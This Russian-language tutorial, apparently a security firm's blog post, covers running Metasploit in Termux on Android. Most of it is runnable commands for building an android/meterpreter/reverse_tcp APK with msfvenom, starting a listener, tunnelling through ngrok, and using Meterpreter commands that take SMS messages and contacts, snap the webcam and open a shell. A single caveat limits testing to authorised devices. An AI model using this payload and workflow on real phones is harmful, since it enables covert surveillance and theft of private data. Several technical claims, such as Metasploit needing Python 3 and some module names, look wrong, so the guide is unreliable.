Мобильные устройства становятся всё более привлекательной целью для злоумышленников. Metasploit Framework – один из самых мощных наборов инструментов для проведения penetration‑тестов, а Termux позволяет запускать полноценную Linux‑среду прямо на Android‑смартфоне. В этой статье мы подробно разберём, как интегрировать Metasploit в Termux и использовать его для мобильных тестов безопасности.
Что понадобится
- Устройство Android с установленным Termux (рекомендовано Android 8.0+).
- Подключение к Интернету для загрузки пакетов.
- Базовые навыки работы в терминале Linux.
- Для полного опыта – доступ к
root(не обязателен, но упрощает настройку некоторых модулей).
Подготовка Termux
Сначала обновим репозитории и установим необходимые утилиты.
pkg update && pkg upgrade -y
pkg install -y git wget curl proot-distro python python-dev clang make openssl-tool libffi-dev libsqlite3-dev libcrypt-dev ncurses-utils
Установим python версии 3, так как Metasploit работает именно с ней. Далее настроим окружение для сборки native‑модулей.
Установка Metasploit Framework
Самый простой способ – использовать готовый скрипт от Rapid7. В Termux он запускается так:
curl -LO https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfvenom
chmod +x msfvenom
Однако предпочтительнее установить полную копию через официальную репозиторию.
# Добавляем репозиторий Metasploit
pkg install -y metasploit
# Инициализируем базу данных
msfdb init
Если пакет metasploit недоступен в официальных репозиториях, используем альтернативный скрипт Metasploit_termux:
git clone https://github.com/Hax4us/Metasploit_termux.git
cd Metasploit_termux
./install.sh
Скрипт автоматически установит все зависимости и соберёт Metasploit под текущую архитектуру.
Первый запуск msfconsole
После установки проверим работу консоли:
msfconsole -q -x "version"
Если всё прошло успешно, вы увидите текущую версию Metasploit и приглашение msf6>. Теперь можно приступать к генерации payload‑ов.
Генерация Android‑payload с помощью msfvenom
Для мобильных тестов часто используют android/meterpreter/reverse_tcp. Пример команды:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -a dalvik -o /sdcard/payload.apk
Параметры:
LHOST– IP‑адрес вашего слушателя (обычно IP в той же сети).LPORT– порт, на котором будет ждать соединения.-a dalvik– указывает архитектуру Android.-o– путь к полученному APK‑файлу.
Установите полученный payload.apk на целевое устройство (для тестов используйте собственный телефон или эмулятор).
Настройка слушателя (listener)
Запустим msfconsole и создадим мульти‑handler:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run
После запуска слушателя откройте payload.apk на целевом устройстве. При выполнении вы увидите сессию Meterpreter в терминале.
Базовые команды Meterpreter на Android
sysinfo– информация о системе.dump_sms– выгрузка SMS‑сообщений.dump_contacts– список контактов.webcam_snap– снимок с камеры (при наличии разрешений).shell– доступ к обычному shell‑у.
Эти команды позволяют быстро оценить уровень защиты устройства.
Сканирование уязвимостей Android‑устройств
Metasploit содержит набор вспомогательных модулей, полезных для предварительного аудита.
use auxiliary/scanner/android/adb_version
set RHOSTS 192.168.1.0/24
run
Модуль проверит, какие устройства в сети отвечают на ADB‑подключения. Другие полезные сканеры:
auxiliary/scanner/http/android_debug_bridge– поиск открытых ADB‑портов.auxiliary/scanner/http/android_app_info– извлечение информации из APK‑файлов.
Лучшие практики и меры предосторожности
- Всегда проводите тесты только на устройствах, на которые есть явное разрешение.
- Отключайте
rootдоступ, если он не нужен, чтобы избежать случайных изменений системы. - Регулярно обновляйте репозитории Termux (
pkg update && pkg upgrade) и Metasploit (git pullв каталоге установки). - Используйте VPN или отдельную подсеть для изоляции тестовой среды.
Устранение распространённых проблем
| Проблема | Причина | Решение |
|---|---|---|
Ошибка Failed to load OpenSSL | Отсутствие библиотеки openssl | Установите её: pkg install openssl-tool |
Метод android/meterpreter/reverse_tcp не работает | Блокировка портов в сети | Откройте нужный порт в роутере или используйте ngrok для туннелирования. |
msfconsole падает с Segmentation fault | Несовместимость архитектуры (ARM vs x86) | Пересоберите Metasploit через скрипт install.sh с параметром --arch arm64. |
Заключение
Интеграция Metasploit Framework в Termux открывает широкие возможности для проведения мобильных penetration‑тестов прямо на вашем Android‑устройстве. Мы рассмотрели процесс установки, генерацию Android‑payload, настройку слушателя и базовые команды Meterpreter, а также полезные сканеры и рекомендации по безопасности. Освоив эти инструменты, вы сможете эффективно оценивать защищённость мобильных приложений и устройств.
Если вам требуется профессиональная помощь в проведении мобильных аудитов, разработке кастомных эксплойтов или обучении персонала, обратитесь к RybinskLab. Мы предоставляем услуги по тестированию безопасности, настройке инфраструктуры и обучению сотрудников современным методикам киберзащиты.